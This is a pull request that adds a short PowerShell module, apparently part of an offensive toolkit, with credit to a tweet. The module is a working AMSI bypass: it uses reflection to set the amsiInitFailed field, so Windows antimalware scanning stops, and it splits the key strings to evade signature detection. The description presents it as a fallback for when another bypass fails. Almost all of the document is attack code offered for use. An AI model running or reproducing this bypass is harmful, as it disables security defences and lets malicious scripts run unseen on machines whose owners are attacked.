### PR TITLE
Add files via upload

### DIFF
--- a/modules/ILBypass.ps1
+++ b/modules/ILBypass.ps1
@@ -1,0 +1,5 @@
+    # ALL CREDIT TO @MATTEFESTATION FOR THE INITIAL TWEET
+    
+    $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
+    $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
+


### PR DESCRIPTION
Added secondary AMSI bypass for when write access is not permitted to /windows/temp which is required for some Add-Type operations and causes ASBBypass to fail.